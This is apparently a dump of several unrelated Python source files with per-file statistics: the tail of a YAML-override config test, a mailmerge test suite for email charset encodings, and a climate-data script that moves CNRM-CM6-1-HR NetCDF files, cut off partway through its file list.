"test-catalog-database-password",
"--catalog-search-hosts",
"test-catalog-search-host1,test-catalog-search-host2",
"--catalog-search-user",
"test-catalog-search-user",
"--catalog-search-password",
"test-catalog-search-password",
"--rest-host",
"test-rest-host",
"--grpc-host",
"test-grpc-host",
"--analysis-execution-mode",
"test-analysis-execution-mode",
"--batch-account-name",
"test-batch-account-name",
"--batch-account-key",
"test-batch-account-key",
"--batch-endpoint",
"test-batch-endpoint",
"--batch-pool-id",
"test-batch-pool-id",
"--max-concurrent-jobs",
"25",
"--variant-default-engine",
"test-variant-default-engine",
"--hadoop-ssh-dns",
"test-hadoop-ssh-host",
"--hadoop-ssh-user",
"test-hadoop-ssh-user",
"--hadoop-ssh-pass",
"test-hadoop-ssh-password",
"--hadoop-ssh-remote-opencga-home",
"test-hadoop-ssh-remote-opencga-home",
"--health-check-interval",
"30",
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
check=False,
)
if res.returncode != 0:
print("Error calling override_yaml.py:")
print(res.stdout)
sys.exit(1)
configs = []
configsRaw = res.stdout.decode("utf-8").split("---")
for config in configsRaw:
configAsFile = StringIO(config)
configs.append(yaml.safe_load(configAsFile))
storage_config = configs[0]
self.assertEqual(
storage_config["variant"]["options"]["annotator"],
"cellbase",
)
self.assertEqual(
storage_config["cellbase"]["host"],
"https://ws.opencb.org/cellbase/",
)
# TODO: Tests for k8s config
if __name__ == "__main__":
unittest.main()
| 38.896552
| 134
| 0.496011
| 2,575
| 29,328
| 5.597282
| 0.067573
| 0.054187
| 0.042462
| 0.044682
| 0.880733
| 0.85631
| 0.813224
| 0.775064
| 0.7598
| 0.749879
| 0
| 0.009577
| 0.348472
| 29,328
| 753
| 135
| 38.948207
| 0.744714
| 0.010093
| 0
| 0.783505
| 0
| 0.004418
| 0.409125
| 0.229513
| 0
| 0
| 0
| 0.001328
| 0.076583
| 1
| 0.013255
| false
| 0.063328
| 0.010309
| 0
| 0.025037
| 0.025037
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
96c5b77f57fc07e706419be266dce25818115dac
| 272
|
py
|
Python
|
thad_roberts_model/__init__.py
|
lukaszp/thad-roberts-model
|
7fcdab69e34228321aa8b83215800ba75cf9ad55
|
[
"MIT"
] | null | null | null |
thad_roberts_model/__init__.py
|
lukaszp/thad-roberts-model
|
7fcdab69e34228321aa8b83215800ba75cf9ad55
|
[
"MIT"
] | null | null | null |
thad_roberts_model/__init__.py
|
lukaszp/thad-roberts-model
|
7fcdab69e34228321aa8b83215800ba75cf9ad55
|
[
"MIT"
] | null | null | null |
import thad_roberts_model.measurement
import thad_roberts_model.particles_masses
import thad_roberts_model.thad_roberts_model
from thad_roberts_model.measurement import *
from thad_roberts_model.particles_masses import *
from thad_roberts_model.thad_roberts_model import *
| 45.333333
| 51
| 0.904412
| 39
| 272
| 5.846154
| 0.205128
| 0.385965
| 0.561404
| 0.289474
| 0.929825
| 0.605263
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0625
| 272
| 6
| 51
| 45.333333
| 0.894118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
96ccf8ea892432c411d077e414be0bfd248f2b43
| 13,808
|
py
|
Python
|
tests/test_template_message_encodings.py
|
thunderbirdtr/mailmerge
|
a47465a78bbb089f3e2f135e7aecaf5e12259e56
|
[
"MIT"
] | 94
|
2016-03-17T18:04:55.000Z
|
2022-03-16T02:59:51.000Z
|
tests/test_template_message_encodings.py
|
thunderbirdtr/mailmerge
|
a47465a78bbb089f3e2f135e7aecaf5e12259e56
|
[
"MIT"
] | 116
|
2016-11-07T16:54:24.000Z
|
2022-01-24T15:14:43.000Z
|
tests/test_template_message_encodings.py
|
thunderbirdtr/mailmerge
|
a47465a78bbb089f3e2f135e7aecaf5e12259e56
|
[
"MIT"
] | 41
|
2016-06-06T16:51:40.000Z
|
2021-12-30T09:57:33.000Z
|
"""
Tests for TemplateMessage with different encodings.
Andrew DeOrio <awdeorio@umich.edu>
"""
import re
import textwrap
from mailmerge import TemplateMessage
def test_utf8_template(tmp_path):
"""Verify UTF8 support in email template."""
template_path = tmp_path / "template.txt"
template_path.write_text(textwrap.dedent("""\
TO: to@test.com
SUBJECT: Testing mailmerge
FROM: from@test.com
From the Tagelied of Wolfram von Eschenbach (Middle High German):
Sîne klâwen durh die wolken sint geslagen,
er stîget ûf mit grôzer kraft,
ich sih in grâwen tägelîch als er wil tagen,
den tac, der im geselleschaft
erwenden wil, dem werden man,
den ich mit sorgen în verliez.
ich bringe in hinnen, ob ich kan.
sîn vil manegiu tugent michz leisten hiez.
http://www.columbia.edu/~fdc/utf8/
"""))
template_message = TemplateMessage(template_path)
sender, recipients, message = template_message.render({
"email": "myself@mydomain.com",
})
# Verify encoding
assert message.get_content_maintype() == "text"
assert message.get_content_subtype() == "plain"
assert message.get_content_charset() == "utf-8"
# Verify sender and recipients
assert sender == "from@test.com"
assert recipients == ["to@test.com"]
# Verify content
plaintext = message.get_payload(decode=True).decode("utf-8")
assert plaintext == textwrap.dedent("""\
From the Tagelied of Wolfram von Eschenbach (Middle High German):
Sîne klâwen durh die wolken sint geslagen,
er stîget ûf mit grôzer kraft,
ich sih in grâwen tägelîch als er wil tagen,
den tac, der im geselleschaft
erwenden wil, dem werden man,
den ich mit sorgen în verliez.
ich bringe in hinnen, ob ich kan.
sîn vil manegiu tugent michz leisten hiez.
http://www.columbia.edu/~fdc/utf8/""")
def test_utf8_database(tmp_path):
"""Verify UTF8 support when template is rendered with UTF-8 value."""
# Simple template
template_path = tmp_path / "template.txt"
template_path.write_text(textwrap.dedent("""\
TO: to@test.com
FROM: from@test.com
Hi {{name}}
"""))
# Render template with context containing unicode characters
template_message = TemplateMessage(template_path)
sender, recipients, message = template_message.render({
"name": "Laȝamon",
})
# Verify sender and recipients
assert sender == "from@test.com"
assert recipients == ["to@test.com"]
# Verify message encoding. The template was ASCII, but when the template
# is rendered with UTF-8 data, the result is UTF-8 encoding.
assert message.get_content_maintype() == "text"
assert message.get_content_subtype() == "plain"
assert message.get_content_charset() == "utf-8"
# Verify content
plaintext = message.get_payload(decode=True).decode("utf-8")
assert plaintext == "Hi Laȝamon"
def test_utf8_to(tmp_path):
"""Verify UTF8 support in TO field."""
template_path = tmp_path / "template.txt"
template_path.write_text(textwrap.dedent("""\
TO: Laȝamon <to@test.com>
FROM: from@test.com
{{message}}
"""))
template_message = TemplateMessage(template_path)
_, recipients, message = template_message.render({
"message": "hello",
})
# Verify recipient name and email
assert recipients == ["to@test.com"]
assert message["to"] == "Laȝamon <to@test.com>"
def test_utf8_from(tmp_path):
"""Verify UTF8 support in FROM field."""
template_path = tmp_path / "template.txt"
template_path.write_text(textwrap.dedent("""\
TO: to@test.com
FROM: Laȝamon <from@test.com>
{{message}}
"""))
template_message = TemplateMessage(template_path)
sender, _, message = template_message.render({
"message": "hello",
})
# Verify sender name and email
assert sender == "Laȝamon <from@test.com>"
assert message["from"] == "Laȝamon <from@test.com>"
def test_utf8_subject(tmp_path):
"""Verify UTF8 support in SUBJECT field."""
template_path = tmp_path / "template.txt"
template_path.write_text(textwrap.dedent("""\
TO: to@test.com
FROM: from@test.com
SUBJECT: Laȝamon
{{message}}
"""))
template_message = TemplateMessage(template_path)
_, _, message = template_message.render({
"message": "hello",
})
# Verify subject
assert message["subject"] == "Laȝamon"
def test_emoji(tmp_path):
"""Verify emoji are encoded."""
template_path = tmp_path / "template.txt"
template_path.write_text(textwrap.dedent("""\
TO: test@test.com
SUBJECT: Testing mailmerge
FROM: test@test.com
Hi 😀
""")) # grinning face emoji
template_message = TemplateMessage(template_path)
_, _, message = template_message.render({})
# Verify encoding
assert message.get_charset() == "utf-8"
assert message["Content-Transfer-Encoding"] == "base64"
# Verify content
plaintext = message.get_payload(decode=True).decode("utf-8")
assert plaintext == "Hi 😀"
def test_emoji_markdown(tmp_path):
"""Verify emoji are encoded in Markdown formatted messages."""
template_path = tmp_path / "template.txt"
template_path.write_text(textwrap.dedent("""\
TO: test@example.com
SUBJECT: Testing mailmerge
FROM: test@example.com
CONTENT-TYPE: text/markdown
```
emoji_string = 😀
```
""")) # grinning face emoji
template_message = TemplateMessage(template_path)
_, _, message = template_message.render({})
# Message should contain an unrendered Markdown plaintext part and a
# rendered Markdown HTML part
message_payload = message.get_payload()[0]
plaintext_part, html_part = message_payload.get_payload()
# Verify encodings
assert str(plaintext_part.get_charset()) == "utf-8"
assert str(html_part.get_charset()) == "utf-8"
assert plaintext_part["Content-Transfer-Encoding"] == "base64"
assert html_part["Content-Transfer-Encoding"] == "base64"
# Verify content, which is base64 encoded grinning face emoji
plaintext = plaintext_part.get_payload(decode=True).decode("utf-8")
htmltext = html_part.get_payload(decode=True).decode("utf-8")
assert plaintext == '```\nemoji_string = \U0001f600\n```'
assert htmltext == (
"<html><body><p><code>"
"emoji_string = \U0001f600"
"</code></p></body></html>"
)
def test_emoji_database(tmp_path):
"""Verify emoji are encoded when they are substituted via template db.
The template is ASCII encoded, but after rendering the template, an emoji
character will substituted into the template. The result should be a utf-8
encoded message.
"""
template_path = tmp_path / "template.txt"
template_path.write_text(textwrap.dedent("""\
TO: test@test.com
SUBJECT: Testing mailmerge
FROM: test@test.com
Hi {{emoji}}
"""))
template_message = TemplateMessage(template_path)
_, _, message = template_message.render({
"emoji": "😀" # grinning face
})
# Verify encoding
assert message.get_charset() == "utf-8"
assert message["Content-Transfer-Encoding"] == "base64"
# Verify content
plaintext = message.get_payload(decode=True).decode("utf-8")
assert plaintext == "Hi 😀"
def test_encoding_us_ascii(tmp_path):
"""Render a simple template with us-ascii encoding."""
template_path = tmp_path / "template.txt"
template_path.write_text(textwrap.dedent("""\
TO: to@test.com
FROM: from@test.com
Hello world
"""))
template_message = TemplateMessage(template_path)
_, _, message = template_message.render({})
assert message.get_charset() == "us-ascii"
assert message.get_content_charset() == "us-ascii"
assert message.get_payload() == "Hello world"
def test_encoding_utf8(tmp_path):
"""Render a simple template with UTF-8 encoding."""
template_path = tmp_path / "template.txt"
template_path.write_text(textwrap.dedent("""\
TO: to@test.com
FROM: from@test.com
Hello Laȝamon
"""))
template_message = TemplateMessage(template_path)
_, _, message = template_message.render({})
assert message.get_charset() == "utf-8"
assert message.get_content_charset() == "utf-8"
plaintext = message.get_payload(decode=True).decode("utf-8")
assert plaintext == "Hello Laȝamon"
def test_encoding_is8859_1(tmp_path):
"""Render a simple template with IS8859-1 encoding.
Mailmerge will coerce the encoding to UTF-8.
"""
template_path = tmp_path / "template.txt"
template_path.write_text(textwrap.dedent("""\
TO: to@test.com
FROM: from@test.com
Hello L'Haÿ-les-Roses
"""))
template_message = TemplateMessage(template_path)
_, _, message = template_message.render({})
assert message.get_charset() == "utf-8"
assert message.get_content_charset() == "utf-8"
plaintext = message.get_payload(decode=True).decode("utf-8")
assert plaintext == "Hello L'Haÿ-les-Roses"
def test_encoding_mismatch(tmp_path):
"""Render a simple template that lies about its encoding.
Header says us-ascii, but it contains utf-8.
"""
template_path = tmp_path / "template.txt"
template_path.write_text(textwrap.dedent("""\
TO: to@test.com
FROM: from@test.com
Content-Type: text/plain; charset="us-ascii"
Hello Laȝamon
"""))
template_message = TemplateMessage(template_path)
_, _, message = template_message.render({})
assert message.get_charset() == "utf-8"
assert message.get_content_charset() == "utf-8"
plaintext = message.get_payload(decode=True).decode("utf-8")
assert plaintext == "Hello Laȝamon"
def test_encoding_multipart(tmp_path):
"""Render a utf-8 template with multipart encoding."""
template_path = tmp_path / "template.txt"
template_path.write_text(textwrap.dedent("""\
TO: to@test.com
FROM: from@test.com
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="boundary"
This is a MIME-encoded message. If you are seeing this, your mail
reader is old.
--boundary
Content-Type: text/plain; charset=utf-8
Hello Laȝamon
--boundary
Content-Type: text/html; charset=utf-8
<html>
<body>
<p>Hello Laȝamon</p>
</body>
</html>
"""))
template_message = TemplateMessage(template_path)
sender, recipients, message = template_message.render({})
# Verify sender and recipients
assert sender == "from@test.com"
assert recipients == ["to@test.com"]
# Should be multipart: plaintext and HTML
assert message.is_multipart()
parts = message.get_payload()
assert len(parts) == 2
plaintext_part, html_part = parts
# Verify plaintext part
assert plaintext_part.get_charset() == "utf-8"
assert plaintext_part.get_content_charset() == "utf-8"
assert plaintext_part.get_content_type() == "text/plain"
plaintext = plaintext_part.get_payload(decode=True).decode("utf-8")
plaintext = plaintext.strip()
assert plaintext == "Hello Laȝamon"
# Verify html part
assert html_part.get_charset() == "utf-8"
assert html_part.get_content_charset() == "utf-8"
assert html_part.get_content_type() == "text/html"
htmltext = html_part.get_payload(decode=True).decode("utf-8")
htmltext = re.sub(r"\s+", "", htmltext) # Strip whitespace
assert htmltext == "<html><body><p>HelloLaȝamon</p></body></html>"
def test_encoding_multipart_mismatch(tmp_path):
"""Render a utf-8 template with multipart encoding and wrong headers.
Content-Type headers say "us-ascii", but the message contains utf-8.
"""
template_path = tmp_path / "template.txt"
template_path.write_text(textwrap.dedent("""\
TO: to@test.com
FROM: from@test.com
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="boundary"
This is a MIME-encoded message. If you are seeing this, your mail
reader is old.
--boundary
Content-Type: text/plain; charset=us-ascii
Hello Laȝamon
--boundary
Content-Type: text/html; charset=us-ascii
<html>
<body>
<p>Hello Laȝamon</p>
</body>
</html>
"""))
template_message = TemplateMessage(template_path)
sender, recipients, message = template_message.render({})
# Verify sender and recipients
assert sender == "from@test.com"
assert recipients == ["to@test.com"]
# Should be multipart: plaintext and HTML
assert message.is_multipart()
parts = message.get_payload()
assert len(parts) == 2
plaintext_part, html_part = parts
# Verify plaintext part
assert plaintext_part.get_charset() == "utf-8"
assert plaintext_part.get_content_charset() == "utf-8"
assert plaintext_part.get_content_type() == "text/plain"
plaintext = plaintext_part.get_payload(decode=True).decode("utf-8")
plaintext = plaintext.strip()
assert plaintext == "Hello Laȝamon"
# Verify html part
assert html_part.get_charset() == "utf-8"
assert html_part.get_content_charset() == "utf-8"
assert html_part.get_content_type() == "text/html"
htmltext = html_part.get_payload(decode=True).decode("utf-8")
htmltext = re.sub(r"\s+", "", htmltext) # Strip whitespace
assert htmltext == "<html><body><p>HelloLaȝamon</p></body></html>"
| 32.261682
| 79
| 0.656938
| 1,702
| 13,808
| 5.179201
| 0.12691
| 0.02042
| 0.026092
| 0.028928
| 0.839932
| 0.809643
| 0.760068
| 0.731821
| 0.718548
| 0.697221
| 0
| 0.00922
| 0.222335
| 13,808
| 427
| 80
| 32.337237
| 0.811231
| 0.146075
| 0
| 0.780488
| 0
| 0
| 0.37123
| 0.024061
| 0
| 0
| 0
| 0
| 0.226481
| 1
| 0.04878
| false
| 0
| 0.010453
| 0
| 0.059233
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8b0514fa0cdcb7f0a0b23606b8d09e03564e297d
| 116,622
|
py
|
Python
|
scripts/update_dreqs/update_dreqs_0004.py
|
jonseddon/primavera-dmt
|
1239044e37f070b925a3d06db68351f285df780c
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/update_dreqs/update_dreqs_0004.py
|
jonseddon/primavera-dmt
|
1239044e37f070b925a3d06db68351f285df780c
|
[
"BSD-3-Clause"
] | 49
|
2018-11-14T17:00:03.000Z
|
2021-12-20T11:04:22.000Z
|
scripts/update_dreqs/update_dreqs_0004.py
|
jonseddon/primavera-dmt
|
1239044e37f070b925a3d06db68351f285df780c
|
[
"BSD-3-Clause"
] | 2
|
2018-07-04T10:58:43.000Z
|
2018-09-29T14:55:08.000Z
|
#!/usr/bin/env python2.7
"""
update_dreqs_0004.py
This file moves files that don't have a variable request out of the submission
directory and intoa spare directory for CNRM_CERFACS for the CNRM-CM6-1-HR
model for the highresSST-present experiment for the v20170518_1970 submission.
"""
import argparse
import logging.config
import os
import shutil
import sys
__version__ = '0.1.0b1'
DEFAULT_LOG_LEVEL = logging.WARNING
DEFAULT_LOG_FORMAT = '%(levelname)s: %(message)s'
logger = logging.getLogger(__name__)
def parse_args():
"""
Parse command-line arguments
"""
parser = argparse.ArgumentParser(description='Fix a data submission')
parser.add_argument('-l', '--log-level', help='set logging level to one of '
'debug, info, warn (the default), or error')
parser.add_argument('--version', action='version',
version='%(prog)s {}'.format(__version__))
args = parser.parse_args()
return args
def main(args):
"""
Main entry point
This list was constructed at the prompt:
cat ~/lotus/3407487.o | grep 'WARNING: File failed validation. ' \
'No variable request found for file' > ~/lotus/no_vr.txt
And then the Python
all_files = list_files('/group_workspaces/jasmin2/primavera4/upload/'
'CNRM-CERFACS/CNRM-CM6-1-HR/incoming/'
'v20170518_1950')
partial_paths = []
with open('no_vr.txt', 'r') as fh:
for line in fh:
fn = line.split(' ')[-1][:-2]
matching = filter(lambda x: fn in x, all_files)
for path in matching:
partial_paths.append('/'.join(path.split('/')[-2:]))
with open('partial_list.txt', 'w') as foh:
foh.write('[\n')
for line in partial_paths:
foh.write("'{}',\n".format(line))
foh.write(']\n')
partial_list.txt was then copied and pasted into the variable
files_to_move below
"""
base_input_dir = ('/group_workspaces/jasmin2/primavera4/upload/'
'CNRM-CERFACS/CNRM-CM6-1-HR/incoming')
dest_dir = ('/group_workspaces/jasmin2/primavera4/upload/'
'CNRM-CERFACS-additional/CNRM-CM6-1-HR/incoming/v20170622_1970')
# if using a modern IDE the next variable assignment might want to be
# rolled up/hidden as it's longer than ideal
files_to_move = [
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197202010000-197202292359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197203010000-197203312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197207010000-197207312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197208010000-197208312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197211010000-197211302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197212010000-197212312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197202010000-197202292359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197203010000-197203312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197205010000-197205312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197206010000-197206302359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197207010000-197207312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197208010000-197208312359.nc',
'v20170518_1970/psl_E3hr_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197210010000-197210312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197001010000-197001312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197002010000-197002282359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197003010000-197003312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197004010000-197004302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197005010000-197005312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197006010000-197006302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197007010000-197007312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197008010000-197008312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197009010000-197009302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197010010000-197010312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197011010000-197011302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197012010000-197012312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197101010000-197101312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197102010000-197102282359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197103010000-197103312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197104010000-197104302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197201010000-197201312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197105010000-197105312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197203010000-197203312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197106010000-197106302359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197208010000-197208312359.nc',
'v20170518_1970/ta_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197209010000-197209302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197107010000-197107312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197108010000-197108312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197109010000-197109302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197110010000-197110312359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197111010000-197111302359.nc',
'v20170518_1970/hus4_6hrPlev_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197112010000-197112312359.nc',
'v20170518_1970/ts_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720101-19721231.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197201010000-197201312359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197204010000-197204302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197211010000-197211302359.nc',
'v20170518_1970/ua_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197212010000-197212312359.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720101-19720131.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720201-19720229.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720401-19720430.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720501-19720531.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720601-19720630.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720801-19720831.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19721101-19721130.nc',
'v20170518_1970/ua_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19721201-19721231.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197201010000-197201312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197202010000-197202292359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197203010000-197203312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197204010000-197204302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197205010000-197205312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197206010000-197206302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197208010000-197208312359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197209010000-197209302359.nc',
'v20170518_1970/va_6hrPlevPt_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197211010000-197211302359.nc',
'v20170518_1970/va_AERmon_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_197201-197212.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720101-19720131.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720201-19720229.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720501-19720531.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720601-19720630.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720701-19720731.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19721001-19721031.nc',
'v20170518_1970/va_Eday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19721201-19721231.nc',
'v20170518_1970/mrso_day_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19700101-19701231.nc',
'v20170518_1970/mrso_day_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19710101-19711231.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720101-19720131.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720401-19720430.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720501-19720531.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720701-19720731.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720801-19720831.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720901-19720930.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19721001-19721031.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19721101-19721130.nc',
'v20170518_1970/zg10_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19721201-19721231.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720101-19720131.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720201-19720229.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720301-19720331.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720601-19720630.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720801-19720831.nc',
'v20170518_1970/zg19_Primday_CNRM-CM6-1-HR_highresSST-present_r1i1p1f1_gn_19720901-19720930.nc',
